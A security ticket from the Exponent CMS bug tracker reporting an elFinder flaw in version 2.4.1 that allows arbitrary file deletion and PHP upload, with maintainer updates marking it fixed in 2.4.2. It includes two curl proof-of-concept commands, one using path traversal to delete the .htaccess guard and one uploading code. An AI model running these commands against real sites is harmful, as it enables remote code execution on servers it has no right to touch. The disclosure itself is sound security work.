Exponent CMS 2.4.1 - Unrestricted File Deletion / Upload Vulnerability in elFinder
Reported by mm | January 10th, 2017 @ 04:52 PM | in 2.4.2 (closed)
Allows deleting arbitrary files and thus bypassing .htaccess restrictions on uploadable executable PHP files due to a flaw in external/elFinder/php/elFinder.class.php
Example:
curl "[exponent]/framework/modules/file/connector/elfinder.php" -F
"cmd=upload" -F "target=l1_" -F "upload[]=" -F
chunk="../[exponent]/files/.htaccess"
curl "[exponent]/framework/modules/file/connector/elfinder.php" -F "cmd=upload" -F "target=l1_" -F "upload[]=@[remote code]"
Comments and changes to this ticket
-
dleffler January 11th, 2017 @ 07:58 PM
- State changed from “new” to “open”
- Tag set to “security”
- Assigned user changed from “expNinja” to “dleffler”
- Milestone set to “2.4.2”
Issue has been addressed in 333rd party library and will be applied to exponent as soon as feasible https://github.com/Studio-42/elFinder/issues/1843
-
dleffler January 14th, 2017 @ 03:05 AM
- State changed from “open” to “resolved”
Fixed by recent push to update elFinder to v2.1.20
Please Sign in or create a free account to add a new ticket.
With your very own profile, you can contribute to projects, track your activity, watch tickets, receive and update tickets through your email and much more.
Create new ticket
Create your profile
Help contribute to this project by taking a few moments to create your personal profile. Create your profile ยป
Bug Tracker for Exponent CMS
dleffler
expNinja